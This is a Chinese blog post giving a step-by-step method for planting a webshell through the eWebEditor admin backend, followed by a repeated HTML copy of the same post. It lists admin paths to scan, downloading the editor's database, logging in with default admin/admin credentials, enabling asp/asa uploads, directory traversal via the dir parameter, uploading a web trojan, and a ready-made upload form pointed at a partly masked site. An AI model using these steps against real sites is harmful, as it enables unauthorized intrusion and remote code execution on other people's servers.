ewebeditor默认后台提取webshell

Author： Mdaeo
发布时间：September 23, 2011
1793 views
No comments
1138 words
Categories： Web

老生常谈ewebeditor默认后台提取webshell

一般很多后台管理或者文章排版都会用到ewebeditor，
1.猜解路径：
从编辑器中查看源码，
如：ewebeditor.asp?id=content1&style=standard_coolblue这样的html代码。
或者通过扫描器扫：
Editor/admin/asp/upload.asp
Editor/admin_login.asp
ewebeditor/admin_login.asp
admin/Editor/admin_login.asp
admin/ewebeditor/admin_login.asp
看版本：
ewebeditor/dialog/about.htm
2.下载mdb
相对目录db下面有ewebeditor.mdb
3.破解管理员密码
默认是admin，admin
4.添加样式
通过拷贝一个样式，然后修改后缀添加asp|asa等，或者修改上传路径目录含有,.asp
5.在ie中构造地址
如：Editor/ewebeditor.asp?id=content1&style=standard_my
Editor/ewebeditor/ewebeditor.htm?id=body&style=popup
或者编辑样式的时候，选择预览都可以出来上传的。
6.翻路径
/ewebeditor/admin//upload.asp?id=16&d_viewmode=&dir=..
这儿dir的..可以随意构造
7.上传web木&马
记得切换到“设计”标签，否则会报“需要换为编辑状态才能使用编辑功能”。
上传asp或者asa
8.手动构在表单的html代码直接传给upload.asp
<form action="http://www.**x.cn/ewebeditor/upload.asp?action=save&type=IMAGE&style=standard1" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=1 style="width:100%">
<input type=hidden name=originalfile value="">
<input type=submit value="upload">
</form>

Last modification：July 14, 2020

© Allow specification reprint

如果觉得我的文章对你有用，请随意赞赏

Leave a Comment Cancel reply
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

Comment *

Name *

🎲

Email *

Site

ewebeditor默认后台提取webshell

Mdaeo • 2011 年 09 月 23 日

<p>老生常谈ewebeditor默认后台提取webshell</p><p>一般很多后台管理或者文章排版都会用到ewebeditor，<br />1.猜解路径：<br />从编辑器中查看源码，<br />如：ewebeditor.asp?id=content1&amp;style=standard_coolblue这样的html代码。<br />或者通过扫描器扫：<br />Editor/admin/asp/upload.asp<br />Editor/admin_login.asp<br />ewebeditor/admin_login.asp<br />admin/Editor/admin_login.asp<br />admin/ewebeditor/admin_login.asp<br />看版本：<br />ewebeditor/dialog/about.htm<br />2.下载mdb<br />相对目录db下面有ewebeditor.mdb<br />3.破解管理员密码<br />默认是admin，admin<br />4.添加样式<br />通过拷贝一个样式，然后修改后缀添加asp|asa等，或者修改上传路径目录含有,.asp<br />5.在ie中构造地址<br />如：Editor/ewebeditor.asp?id=content1&amp;style=standard_my<br />Editor/ewebeditor/ewebeditor.htm?id=body&amp;style=popup<br />或者编辑样式的时候，选择预览都可以出来上传的。<br />6.翻路径<br />/ewebeditor/admin//upload.asp?id=16&amp;d_viewmode=&amp;dir=..<br />这儿dir的..可以随意构造<br />7.上传web木&amp;马<br />记得切换到&ldquo;设计&rdquo;标签，否则会报&ldquo;需要换为编辑状态才能使用编辑功能&rdquo;。<br />上传asp或者asa<br />8.手动构在表单的html代码直接传给upload.asp<br />&lt;form action=&quot;<a href="http://www.**x.cn/ewebeditor/upload.asp?action=save&amp;type=IMAGE&amp;style=standard1" target="_blank" rel="noopener noreferrer"><font color="#0000ff">http://www.**x.cn/ewebeditor/upload.asp?action=save&amp;type=IMAGE&amp;style=<strong>standard1</strong></font></a>&quot; method=post name=myform enctype=&quot;multipart/form-data&quot;&gt;<br />&lt;input type=file name=uploadfile size=1 style=&quot;width:100%&quot;&gt;<br />&lt;input type=hidden name=originalfile value=&quot;&quot;&gt;<br />&lt;input type=submit value=&quot;upload&quot;&gt;<br />&lt;/form&gt;</p>